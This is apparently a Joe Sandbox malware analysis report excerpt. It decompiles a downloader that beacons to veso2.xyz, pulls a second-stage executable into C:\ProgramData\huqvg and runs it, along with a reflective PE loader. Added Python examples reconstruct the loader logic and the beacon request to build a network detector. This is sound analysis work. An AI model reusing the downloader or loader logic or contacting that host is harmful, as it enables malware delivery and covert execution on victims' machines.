    • recv.WS2_32(?,?,00000BB8,00000000), ref: 033718C1
    Strings
    • POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s, xrefs: 0337172E
    • ping, xrefs: 03371657
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: Startupconnectgethostbynamehtonsrecvsendsocketwsprintf
    • String ID: POST %s HTTP/1.1Host: %sPragma: no-cacheContent-Length: %d%s$ping
    • API String ID: 1466141387-1232505173
    • Opcode ID: f76a058968d8d38a02bc32f2d14cf796cc3f330a83ae2739c5db36d1bd87403b
    • Instruction ID: cf39feb90186deb5218ecd6237716500d401723789a04bdd5b465108476d364e
    • Opcode Fuzzy Hash: f76a058968d8d38a02bc32f2d14cf796cc3f330a83ae2739c5db36d1bd87403b
    • Instruction Fuzzy Hash: 22B10375D042A89FDB20DF64DD84AD9B7B9AF48300F0085C9E58DE7285D7B46AC4CF61
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    (graph image not reproduced) basic blocks 11921a0-11923c6; calls IsBadHugeReadPtr, SetLastError; subcall 1191a20
    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 011921F9
    • SetLastError.KERNEL32(0000007E), ref: 0119223B
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ErrorHugeLastRead
    • String ID:
    • API String ID: 3239643929-0
    • Opcode ID: 88b5f71b9a24685b02a179a60394f8ab8ed429b5ee289f9b35cd5072d0e2bcd2
    • Instruction ID: fd8a2a22c17c528bb377cb98325e131eaaff1fc85092d16464f8e0c1ffe14295
    • Opcode Fuzzy Hash: 88b5f71b9a24685b02a179a60394f8ab8ed429b5ee289f9b35cd5072d0e2bcd2
    • Instruction Fuzzy Hash: 2181AB74A04209EFDB08DF98C894AADBBB1FF48314F148158E919AB355D734EA81CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    (graph image not reproduced) basic blocks 11a18c0-11a1ae9; calls IsBadReadPtr, SetLastError; subcalls 11a1af0, 11a1170
    C-Code - Quality: 37%
    			E011A18C0(intOrPtr __ecx, intOrPtr* _a4) {
    				void* _v8;
    				signed int* _v12;
    				intOrPtr _v16;
    				intOrPtr* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _t114;
    				intOrPtr _t117;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				void* _t206;
    				void* _t207;
    
    				_v44 = __ecx;
    				_t3 = _a4 + 4; // 0x3
    				_v16 =  *_t3;
    				_v28 = 1;
    				_v32 =  *_a4 + 0xbadc25;
    				if( *((intOrPtr*)(_v32 + 4)) != 0) {
    					_v8 = _v16 +  *_v32;
    					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) { // 0x14 == sizeof(IMAGE_IMPORT_DESCRIPTOR); +0xc is its Name field
    						_t21 = _a4 + 0x28; // 0x0
    						_t26 = _a4 + 0x1c; // 0x0, executed
    						_t114 =  *((intOrPtr*)( *_t26))(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *_t21); // executed; LoadLibrary-style callback at +0x1c of the loader context, given the imported DLL name
    						_t207 = _t206 + 8;
    						_v24 = _t114;
    						if(_v24 != 0) {
    							_t31 = _a4 + 0xc; // 0xffff
    							_t35 = _a4 + 8; // 0x4
    							_t117 = E011A1170( *_t35, 4 +  *_t31 * 4); // executed
    							_t206 = _t207 + 8;
    							_v36 = _t117;
    							if(_v36 != 0) {
    								 *((intOrPtr*)(_a4 + 8)) = _v36;
    								_t48 = _a4 + 0xc; // 0xffff
    								_t50 = _a4 + 8; // 0x4
    								 *((intOrPtr*)( *_t50 +  *_t48 * 4)) = _v24;
    								_t55 = _a4 + 0xc; // 0xffff
    								 *(_a4 + 0xc) =  *_t55 + 1;
    								if( *_v8 == 0) {
    									_v12 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    								} else {
    									_v12 = _v16 +  *_v8;
    									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
    								}
    								while( *_v12 != 0) {
    									if(( *_v12 & 0x80000000) == 0) {
    										_v40 = _v16 +  *_v12;
    										_t91 = _a4 + 0x28; // 0x0
    										_t95 = _a4 + 0x20; // 0x0
    										_t135 =  *((intOrPtr*)( *_t95))(_v24, _v40 + 2,  *_t91);
    										_t206 = _t206 + 0xc;
    										 *_v20 = _t135;
    									} else {
    										_t81 = _a4 + 0x28; // 0x0
    										_t85 = _a4 + 0x20; // 0x0
    										_t140 =  *((intOrPtr*)( *_t85))(_v24,  *_v12 & 0x0000ffff,  *_t81);
    										_t206 = _t206 + 0xc;
    										 *_v20 = _t140;
    									}
    									if( *_v20 != 0) {
    										_v12 =  &(_v12[1]);
    										_v20 = _v20 + 4;
    										continue;
    									} else {
    										_v28 = 0;
    										break;
    									}
    								}
    								if(_v28 != 0) {
    									_v8 = _v8 + 0x14;
    									continue;
    								}
    								_t101 = _a4 + 0x28; // 0x0
    								_t104 = _a4 + 0x24; // 0x0
    								 *((intOrPtr*)( *_t104))(_v24,  *_t101);
    								SetLastError(0x7f); // ERROR_PROC_NOT_FOUND: an import could not be resolved
    								break;
    							}
    							_t39 = _a4 + 0x28; // 0x0
    							_t42 = _a4 + 0x24; // 0x0
    							 *((intOrPtr*)( *_t42))(_v24,  *_t39);
    							SetLastError(0xe); // ERROR_OUTOFMEMORY
    							_v28 = 0;
    							break;
    						}
    						SetLastError(0x7e); // ERROR_MOD_NOT_FOUND: the DLL load callback returned NULL
    						_v28 = 0;
    						break;
    					}
    					return _v28;
    				}
    				return 1;
    			}

    Instruction addresses (one per decompiled line above): 0x011a18c6 .. 0x011a1ae3

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011A191C
    • SetLastError.KERNEL32(0000007E), ref: 011A195E
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLastRead
    • String ID:
    • API String ID: 4100373531-0
    • Opcode ID: 22ece9b88b11801215e915752318c59c68cab7abb1a1ce6d964d708a7e870799
    • Instruction ID: 22e66af2499eb9b7077e0e7f7f2e07ec618a590cb300a012b4d7666dfaa55108
    • Opcode Fuzzy Hash: 22ece9b88b11801215e915752318c59c68cab7abb1a1ce6d964d708a7e870799
    • Instruction Fuzzy Hash: D281B878A00209EFDB08CF88C590BAEBBB1FF48314F548158E959AB355D774EA81CF95
    Uniqueness

    Uniqueness Score: -1.00%
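
    The loop in E011A18C0 (and its second entry E011A190D further down) is the import-resolution step of a manual PE mapper: walk IMAGE_IMPORT_DESCRIPTOR entries (0x14 bytes each, hence the IsBadReadPtr(_v8, 0x14) guard) until the Name field is zero, load each DLL through the callback at offset 0x1c of the loader context, then resolve every thunk through the callback at offset 0x20, by ordinal when bit 31 is set and otherwise by the name that follows the two-byte hint; OriginalFirstThunk is used when present, FirstThunk otherwise. The Python below is an added example, not code from the sample or from the report: it re-implements that walk over a constructed 32-bit image fragment so the structure can be checked offline. The layout, DLL names and function names in build_sample_image are made up for the test.

```python
import struct

# PE constants (winnt.h), spelled out so the example runs off-Windows.
IMAGE_IMPORT_DESCRIPTOR_SIZE = 0x14   # the 0x14 passed to IsBadReadPtr in E011A18C0
IMAGE_ORDINAL_FLAG32 = 0x80000000     # the bit-31 test on each thunk entry


def _cstring(image: bytes, rva: int) -> str:
    """NUL-terminated ASCII string at an RVA of an already-mapped image."""
    end = image.index(b"\x00", rva)
    return image[rva:end].decode("ascii")


def walk_imports(image: bytes, import_dir_rva: int):
    """Enumerate the import directory of a 32-bit image laid out by RVA
    (image[rva] is the byte at that RVA).

    Returns [(dll_name, [("name", "Func") | ("ordinal", n), ...]), ...].
    Mirrors E011A18C0: stop when the next descriptor is not readable or its
    Name field is zero; iterate the OriginalFirstThunk array, falling back to
    FirstThunk when OriginalFirstThunk is zero."""
    resolved = []
    desc = import_dir_rva
    while desc + IMAGE_IMPORT_DESCRIPTOR_SIZE <= len(image):   # IsBadReadPtr stand-in
        oft, _timestamp, _forwarder, name_rva, ft = struct.unpack_from("<5I", image, desc)
        if name_rva == 0:
            break
        dll = _cstring(image, name_rva)
        lookup = oft if oft != 0 else ft          # _v12 in the decompiled code
        entries = []
        while True:
            (thunk,) = struct.unpack_from("<I", image, lookup)
            if thunk == 0:
                break
            if thunk & IMAGE_ORDINAL_FLAG32:
                entries.append(("ordinal", thunk & 0xFFFF))
            else:
                # IMAGE_IMPORT_BY_NAME: 2-byte hint, then the name (the "+ 2" in the decompile)
                entries.append(("name", _cstring(image, thunk + 2)))
            lookup += 4
        resolved.append((dll, entries))
        desc += IMAGE_IMPORT_DESCRIPTOR_SIZE
    return resolved


def build_sample_image() -> bytes:
    """Constructed test image (not from the sample): two descriptors plus the
    all-zero terminator at RVA 0, thunk arrays at 0x40/0x60/0x70, strings from 0x80."""
    img = bytearray(0x100)

    def put(rva, data):
        img[rva:rva + len(data)] = data

    put(0x00, struct.pack("<5I", 0x40, 0, 0, 0x80, 0x60))   # OFT, stamp, fwd, Name, FT
    put(0x14, struct.pack("<5I", 0, 0, 0, 0x90, 0x70))      # OFT == 0: FirstThunk is used
    put(0x40, struct.pack("<3I", 0xA0, IMAGE_ORDINAL_FLAG32 | 47, 0))
    put(0x60, struct.pack("<3I", 0xA0, IMAGE_ORDINAL_FLAG32 | 47, 0))
    put(0x70, struct.pack("<2I", 0xB0, 0))
    put(0x80, b"KERNEL32.dll\x00")
    put(0x90, b"WS2_32.dll\x00")
    put(0xA0, b"\x00\x00VirtualAlloc\x00")   # hint 0, then the name
    put(0xB0, b"\x00\x00connect\x00")
    return bytes(img)


if __name__ == "__main__":
    for dll, funcs in walk_imports(build_sample_image(), 0):
        print(dll, funcs)
```

    On a memory dump such as the 011A0000 region listed under Memory Dump Source, the same walker can be pointed at the import directory RVA from the data directory to list what the mapped module binds, without executing anything.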

    Control-flow Graph

    (graph image not reproduced) basic blocks 115002d-1150455; calls GetNativeSystemInfo, VirtualAlloc, VirtualProtect; subcalls 1150456 (6 times), 1192690
    APIs
    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,01150005), ref: 011500E9
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,01150005), ref: 01150111
    Memory Dump Source
    • Source File: 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1150000_rundll32.jbxd
    Similarity
    • API ID: AllocInfoNativeSystemVirtual
    • String ID:
    • API String ID: 2032221330-0
    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction ID: 4b51d978ad25d3ec3282084c2ab42ec92477f4806fac8ece5158a499f96d6d77
    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction Fuzzy Hash: 18D19F71604706DFD798CF99C88076AB7E0BF88318F18452DFDA58B242E774E845CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    (graph image not reproduced) basic blocks 33710b0-337119a; calls Sleep; subcalls 3371640, 3371350, 33712b0, 3371a04
    C-Code - Quality: 49%
    			E033710B0(void* __eflags) {
    				signed int _v8;
    				void _v36;
    				void _v68;
    				signed char* _v72;
    				signed char* _v76;
    				char _v80;
    				char _v84;
    				signed char* _t28;
    				signed char* _t30;
    				void* _t34;
    				signed char* _t46;
    				signed int _t71;
    				void* _t72;
    				void* _t75;
    				void* _t76;
    				void* _t80;
    
    				_t80 = __eflags;
    				_v8 =  *0x3373004 ^ _t71;
    				memcpy( &_v36, "http://veso2.xyz/campo/r/r1", 7 << 2);
    				memcpy( &_v68, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
    				asm("movsw");
    				asm("movsb");
    				_t28 = E03371640(_t80,  &_v36,  &_v84, 1); // executed; stage 1: POST to http://veso2.xyz/campo/r/r1 (_v36), response buffer returned, length in _v84
    				_t75 = _t72 + 0x24;
    				_v72 = _t28;
    				_t46 = _v72;
    				_t81 = ( *_t46 & 0x000000ff) - 0x68;
    				if(( *_t46 & 0x000000ff) != 0x68) { // 0x68 == 'h': the response is used as the URL of the next request, so it is expected to start with "http"
    					 *0x3373008(_v72); // indirect call through the import table, also used for cleanup below (likely free)
    					 *0x3373020(1); // indirect call with argument 1, never returns here (likely exit)
    					_t75 = _t75 + 8;
    				}
    				_t30 = E03371640(_t81, _v72,  &_v80, 1); // stage 2: fetch the URL returned by stage 1, length in _v80
    				_t76 = _t75 + 0xc;
    				_v76 = _t30;
    				if(( *_v76 & 0x000000ff) == 0x4d) { // 0x4d == 'M': the download starts with an MZ header
    					E03371350(_v76, _v80,  &_v68); // buffer, length and C:\ProgramData\huqvg\huqvg.exe (_v68)
    					_t76 = _t76 + 0xc;
    					Sleep(0x3a98); // 15000 ms
    					E033712B0(); // next stage; its body is not in this excerpt
    				}
    				 *0x3373008(_v76);
    				_t34 =  *0x3373008(_v72);
    				E03371A04();
    				return _t34;
    			}

    Instruction addresses (one per decompiled line above): 0x033710b0 .. 0x0337119a

    APIs
      • Part of subcall function 03371640: wsprintfA.USER32 ref: 0337173A
      • Part of subcall function 03371640: WSAStartup.WS2_32(00000102,?), ref: 0337174F
    • Sleep.KERNEL32(00003A98), ref: 03371166
    Strings
    • http://veso2.xyz/campo/r/r1, xrefs: 033710C7
    • C:\ProgramData\huqvg\huqvg.exe, xrefs: 033710D6
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: SleepStartupwsprintf
    • String ID: C:\ProgramData\huqvg\huqvg.exe$http://veso2.xyz/campo/r/r1
    • API String ID: 1691369139-3004619249
    • Opcode ID: e639489f4f4e76872ed355c5709c243d1208f1387c60783ac574e68ddd65f416
    • Instruction ID: eabdbdb26e0f75d0e1c5609ed583d9a6e74c1d2bc0c8a434013f106021ace170
    • Opcode Fuzzy Hash: e639489f4f4e76872ed355c5709c243d1208f1387c60783ac574e68ddd65f416
    • Instruction Fuzzy Hash: BB21B876E001089BDB24EBE4DC85EDFBB79FF48304F140028E506AB245D679AA05CBD1
    Uniqueness

    Uniqueness Score: -1.00%
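
    The API listing for E03371640 above (wsprintfA, WSAStartup, socket, gethostbyname, connect, send, recv with the POST format string) and E033710B0 here give a complete picture of the beacon: a raw-socket HTTP/1.1 POST carrying only Host, Pragma: no-cache and Content-Length, first to http://veso2.xyz/campo/r/r1 and then to whatever URL the first response returns. Nothing in the format string sets a User-Agent, which makes the request easy to tell apart from a browser or WinINet client. The Python below is an added example, not the sample's code and not part of the report: it rebuilds the request from the recovered format string and runs a parser-based check over constructed traffic. Assumptions: the header separators are CRLF (the report shows them collapsed), the URL is split into host veso2.xyz and path /campo/r/r1, the body is the string "ping" cross-referenced in the same function, and the 64-byte body limit is a threshold chosen for the check.

```python
# Request format recovered from the string at 0337172E. The report shows the
# separators collapsed; CRLF line endings are assumed here.
BEACON_FORMAT = (b"POST %s HTTP/1.1\r\nHost: %s\r\nPragma: no-cache\r\n"
                 b"Content-Length: %d\r\n\r\n%s")

EXPECTED_HEADERS = {b"host", b"pragma", b"content-length"}
MAX_BEACON_BODY = 64   # chosen threshold: the beacon body is a short token


def build_beacon(path: bytes, host: bytes, body: bytes) -> bytes:
    """What the sample's wsprintfA/send pair puts on the wire (reconstruction)."""
    return BEACON_FORMAT % (path, host, len(body), body)


def parse_request(raw: bytes):
    """Minimal HTTP/1.1 request parser: returns (method, target, headers, body).
    Header names are lower-cased and kept in wire order. Raises ValueError on
    a malformed request line."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = []
    for line in lines[1:]:
        name, _colon, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, headers, body


def is_hand_rolled_beacon(raw: bytes) -> bool:
    """True when a request has exactly the shape of the sample's beacon: a POST
    whose only headers are Host, Pragma: no-cache and Content-Length (no
    User-Agent, Content-Type or Accept), with a short body matching the
    declared length."""
    try:
        method, _target, headers, body = parse_request(raw)
    except ValueError:
        return False
    names = [name for name, _ in headers]
    if method != b"POST" or len(names) != 3 or set(names) != EXPECTED_HEADERS:
        return False
    values = dict(headers)
    if values[b"pragma"].lower() != b"no-cache":
        return False
    try:
        declared = int(values[b"content-length"])
    except ValueError:
        return False
    return declared == len(body) and len(body) <= MAX_BEACON_BODY


# Constructed traffic samples (not captures from the analysis run).
SAMPLE_BEACON = build_beacon(b"/campo/r/r1", b"veso2.xyz", b"ping")
SAMPLE_BROWSER_POST = (
    b"POST /login HTTP/1.1\r\nHost: example.org\r\nUser-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 9\r\n"
    b"\r\nuser=test")

if __name__ == "__main__":
    print(SAMPLE_BEACON.decode())
    print("beacon flagged:", is_hand_rolled_beacon(SAMPLE_BEACON))
    print("browser flagged:", is_hand_rolled_beacon(SAMPLE_BROWSER_POST))
```

    The check keys on the header set rather than on the domain, so it still fires when the stage-1 response points the second request at a different host; pair it with the DNS and URL indicators from the report for the specific infrastructure.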

    Control-flow Graph

    (graph image not reproduced) basic blocks 3371040-33710a7; calls CreateDirectoryA; subcall 3371a04
    C-Code - Quality: 100%
    			E03371040() {
    				signed int _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _t12;
    				char _t13;
    				int _t15;
    				void* _t16;
    				char _t17;
    				intOrPtr _t18;
    				char _t21;
    				char _t22;
    				signed int _t23;
    
    				_v8 =  *0x3373004 ^ _t23;
    				_t12 = "C:\\ProgramData\\huqvg"; // 0x505c3a43
    				_v32 = _t12;
    				_t17 = "rogramData\\huqvg"; // 0x72676f72
    				_v28 = _t17;
    				_t21 = "amData\\huqvg"; // 0x61446d61
    				_v24 = _t21;
    				_t13 = "ta\\huqvg"; // 0x685c6174
    				_v20 = _t13;
    				_t18 =  *0x3372110; // 0x67767175
    				_v16 = _t18;
    				_t22 =  *0x3372114; // 0x0
    				_v12 = _t22;
    				_t15 = CreateDirectoryA( &_v32, 0); // executed
    				if(_t15 == 0) {
    					_t16 = 0;
    				} else {
    					_t16 = 1;
    				}
    				E03371A04();
    				return _t16;
    			}

    Instruction addresses (one per decompiled line above): 0x0337104d .. 0x033710a7

    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,033712A3), ref: 0337108A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: CreateDirectory
    • String ID: C:\ProgramData\huqvg
    • API String ID: 4241100979-3793086718
    • Opcode ID: 72f895e9b85fc31beae08449a66b4f919034f2944417c79fcbdd6e7a2950d153
    • Instruction ID: ad5c5c67bb06b4a8b39f3e7a0aa1f2a10c54652a76cd0cf28d257321799ec98f
    • Opcode Fuzzy Hash: 72f895e9b85fc31beae08449a66b4f919034f2944417c79fcbdd6e7a2950d153
    • Instruction Fuzzy Hash: B7013C74E0424C9FCB24EFAAE5C16AEBBF8FB19300F004469D945D3344D6349A04CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    (graph image not reproduced) basic blocks 11a1460-11a15ad; calls VirtualFree, VirtualProtect
    C-Code - Quality: 100%
    			E011A1460(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				long _v40;
    				int _t74;
    
    				_v36 = __ecx;
    				if(_a8[2] != 0) {
    					if((_a8[3] & 0x02000000) == 0) {
    						if((_a8[3] & 0x20000000) == 0) {
    							_v12 = 0;
    						} else {
    							_v12 = 1;
    						}
    						_v24 = _v12;
    						if((_a8[3] & 0x40000000) == 0) {
    							_v16 = 0;
    						} else {
    							_v16 = 1;
    						}
    						_v28 = _v16;
    						if((_a8[3] & 0x80000000) == 0) {
    							_v20 = 0;
    						} else {
    							_v20 = 1;
    						}
    						_v32 = _v20;
    						_t48 = _v28 * 8; // 0x2347118
    						_v8 =  *((intOrPtr*)((_v24 << 4) + _t48 + 0x11a5a00 + _v32 * 4));
    						if((_a8[3] & 0x04000000) != 0) {
    							_v8 = _v8 | 0x00000200;
    						}
    						_t74 = VirtualProtect( *_a8, _a8[2], _v8,  &_v40); // executed; _v8 is the PAGE_* value selected above from the section characteristics
    						if(_t74 != 0) {
    							return 1;
    						} else {
    							return 0;
    						}
    					}
    					if( *_a8 != _a8[1]) {
    						L8:
    						return 1;
    					}
    					if(_a8[4] != 0) {
    						L7:
    						VirtualFree( *_a8, _a8[2], 0x4000); // executed; 0x4000 == MEM_DECOMMIT: release a discardable section that owns whole pages
    						goto L8;
    					}
    					_t14 = _a4 + 0x30; // 0x0
    					if( *((intOrPtr*)( *_a4 + 0x38)) ==  *_t14 || _a8[2] %  *(_a4 + 0x30) == 0) {
    						goto L7;
    					} else {
    						goto L8;
    					}
    				}
    				return 1;
    			}

    Instruction addresses (one per decompiled line above): 0x011a1466 .. 0x011a15a1

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00004000,?,?,?,?,011A1718,011A4000,?,011A4000,00000000), ref: 011A14D4
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: f1b7602c86294db3faa663711299814d8d072bd1fc9ef9d0c503a5df25d4abaa
    • Instruction ID: e0c8d7134982ac7f93515b1db42b38c8da48d95126f48ce17223f451aabde6ad
    • Opcode Fuzzy Hash: f1b7602c86294db3faa663711299814d8d072bd1fc9ef9d0c503a5df25d4abaa
    • Instruction Fuzzy Hash: 9C41FB78A00209EFDB18CF48C094BA9BBB2FF88314F58C159E85A5F355C775EA81CB80
    Uniqueness

    Uniqueness Score: -1.00%
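
    E011A1460 is the section-finalisation step of the same mapper. For a non-discardable section it turns the IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ and IMAGE_SCN_MEM_WRITE bits (0x20000000, 0x40000000, 0x80000000) into an index into a 2x2x2 DWORD table at 0x11a5a00 (index = execute*16 + read*8 + write*4), ORs in PAGE_NOCACHE (0x200) when IMAGE_SCN_MEM_NOT_CACHED (0x04000000) is set, and hands the result to VirtualProtect. For a discardable section (0x02000000) it decides whether VirtualFree(MEM_DECOMMIT) is safe: only when the section starts on its aligned address and either is the last section, or SectionAlignment equals the page size, or the size is a whole number of pages. The Python below is an added example, not code from the sample: the contents of the table at 0x11a5a00 are not visible in the dump, so the PAGE_* value assigned to each index is an assumption (the mapping a loader needs for the flags to keep their documented meaning).

```python
# IMAGE_SCN_* characteristics tested by E011A1460 and the PAGE_* values it can
# hand to VirtualProtect (winnt.h constants, spelled out to run anywhere).
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_NOT_CACHED  = 0x04000000
IMAGE_SCN_MEM_EXECUTE     = 0x20000000
IMAGE_SCN_MEM_READ        = 0x40000000
IMAGE_SCN_MEM_WRITE       = 0x80000000

PAGE_NOACCESS          = 0x001
PAGE_READONLY          = 0x002
PAGE_READWRITE         = 0x004
PAGE_WRITECOPY         = 0x008
PAGE_EXECUTE           = 0x010
PAGE_EXECUTE_READ      = 0x020
PAGE_EXECUTE_READWRITE = 0x040
PAGE_EXECUTE_WRITECOPY = 0x080
PAGE_NOCACHE           = 0x200

# Stand-in for the [execute][read][write] table at 0x11a5a00. The dump does not
# show its contents; these values are an assumption, not data read from the sample.
PROTECTION_TABLE = {
    (0, 0, 0): PAGE_NOACCESS,     (0, 0, 1): PAGE_WRITECOPY,
    (0, 1, 0): PAGE_READONLY,     (0, 1, 1): PAGE_READWRITE,
    (1, 0, 0): PAGE_EXECUTE,      (1, 0, 1): PAGE_EXECUTE_WRITECOPY,
    (1, 1, 0): PAGE_EXECUTE_READ, (1, 1, 1): PAGE_EXECUTE_READWRITE,
}


def section_protection(characteristics: int) -> int:
    """Page protection the loader applies to a non-discardable section."""
    key = (
        int(bool(characteristics & IMAGE_SCN_MEM_EXECUTE)),   # _v24
        int(bool(characteristics & IMAGE_SCN_MEM_READ)),      # _v28
        int(bool(characteristics & IMAGE_SCN_MEM_WRITE)),     # _v32
    )
    prot = PROTECTION_TABLE[key]
    if characteristics & IMAGE_SCN_MEM_NOT_CACHED:
        prot |= PAGE_NOCACHE                                   # the "| 0x200" branch
    return prot


def finalize_action(characteristics, address, aligned_address, size,
                    is_last, section_alignment, page_size):
    """Decision E011A1460 makes for one section.

    ("skip", None)      empty section, nothing to do
    ("protect", PAGE_x) section stays mapped with that protection
    ("decommit", None)  discardable section released with VirtualFree(MEM_DECOMMIT)
    ("keep", None)      discardable section that shares a page with a neighbour
    """
    if size == 0:
        return ("skip", None)
    if not characteristics & IMAGE_SCN_MEM_DISCARDABLE:
        return ("protect", section_protection(characteristics))
    if address != aligned_address:          # *_a8 != _a8[1]
        return ("keep", None)
    if is_last or section_alignment == page_size or size % page_size == 0:
        return ("decommit", None)
    return ("keep", None)


if __name__ == "__main__":
    for name, flags in ((".text", 0x60000020), (".rdata", 0x40000040),
                        (".data", 0xC0000040), (".reloc", 0x42000040)):
        print(name, hex(flags), finalize_action(flags, 0x1000, 0x1000, 0x200,
                                                False, 0x1000, 0x1000))
```

    The same mapping is what a memory scanner expects to see after a reflective load: an executable region whose protection was derived from section flags rather than from the image loader, with no backing file, which is why the 011A0000 and 03370000 regions above show up as unbacked private memory.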

    Control-flow Graph

    (graph image not reproduced) basic blocks 11a12a0-11a13ee; calls VirtualAlloc; subcalls 11a1270, 11a1080, 11a10d0
    C-Code - Quality: 100%
    			E011A12A0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				long _v24;
    				intOrPtr _v28;
    				void* _t76;
    				void* _t127;
    
    				_v28 = __ecx;
    				_t3 = _a16 + 4; // 0xf5e9
    				_v16 =  *_t3;
    				_t7 =  *_a16 + 0x14; // 0x508bf84d
    				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x11a1e76
    				_v8 =  *_a16 + _t9;
    				_v20 = 0;
    				while(1) {
    					_t17 =  *_a16 + 6; // 0xe9000000
    					if(_v20 >= ( *_t17 & 0x0000ffff)) {
    						break;
    					}
    					if( *(_v8 + 0x10) != 0) {
    						if(E011A1270(_v28, _a8,  *((intOrPtr*)(_v8 + 0x14)) +  *(_v8 + 0x10)) != 0) {
    							_t76 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *(_v8 + 0x10), 0x1000, 4); // executed; MEM_COMMIT, PAGE_READWRITE at ImageBase + VirtualAddress for SizeOfRawData bytes, then the raw data is copied in
    							_v12 = _t76;
    							if(_v12 != 0) {
    								_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
    								E011A10D0(_v12, _a4 +  *((intOrPtr*)(_v8 + 0x14)),  *(_v8 + 0x10));
    								_t127 = _t127 + 0xc;
    								 *((intOrPtr*)(_v8 + 8)) = _v12;
    								L1:
    								_v20 = _v20 + 1;
    								_v8 = _v8 + 0x28;
    								continue;
    							}
    							return 0;
    						}
    						return 0;
    					}
    					_v24 =  *((intOrPtr*)(_a12 + 0x38));
    					if(_v24 <= 0) {
    						L8:
    						goto L1;
    					}
